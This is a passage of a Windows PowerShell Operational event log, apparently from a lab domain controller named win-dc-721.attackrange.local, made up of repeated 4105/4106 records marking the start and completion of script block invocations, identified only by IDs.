SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477727
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477726
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477725
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477724
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477723
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477722
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477721
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477720
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477719
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477718
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477717
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477716
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477715
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477714
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477713
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477712
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477711
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477710
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477709
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477708
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477707
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477706
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477705
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477704
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477703
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477702
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477701
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477700
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477699
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477698
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477697
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477696
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477695
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477694
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477693
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477692
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477691
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477690
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477689
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477688
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477687
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477686
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477685
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477684
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477683
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477682
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477681
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477680
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477679
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477678
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477677
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477676
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477675
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477674
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477673
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477672
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
